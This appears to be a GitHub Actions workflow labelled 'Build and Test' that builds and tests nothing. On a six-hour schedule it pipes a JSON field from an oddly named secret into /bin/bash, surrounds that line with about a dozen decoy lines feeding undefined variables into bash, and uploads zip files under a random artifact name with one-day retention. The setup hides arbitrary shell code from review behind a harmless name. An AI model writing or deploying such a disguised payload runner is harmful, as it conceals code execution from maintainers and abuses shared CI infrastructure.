name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '5 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          xcfvi3367: ${{ secrets.xcfvi3367 }}
        run: |
          printf '%s' "$xcfvi3367" | jq -r .k7 | /bin/bash
          printf '%s' "$ivvtg34039" | jq -r .mbi51934 | /bin/bash
          echo $jgo7 | jq -r .j4 | /bin/bash
          printf '%s' "$fpv7" | jq -r .t67986 | /bin/bash
          echo $y944 | jq -r .qqo615 | /bin/bash
          printf '%s' "$n97" | jq -r .pmd27321 | /bin/bash
          echo $atza4 | jq -r .jxe98 | /bin/bash
          echo $ul53 | jq -r .m68 | /bin/bash
          printf '%s' "$evvl0" | jq -r .mil136 | /bin/bash
          printf '%s' "$ohmd4" | jq -r .rtmdo3837 | /bin/bash
          printf '%s' "$y30" | jq -r .hmb07199 | /bin/bash
          printf '%s' "$iuvkk50475" | jq -r .asod1312 | /bin/bash
          echo $rkhh10991 | jq -r .ucgs67 | /bin/bash
          printf '%s' "$fcya886" | jq -r .py880 | /bin/bash
          printf '%s' "$t5" | jq -r .pvdb310 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: iYtiQNae
          path: "*.zip"
          retention-days: 1
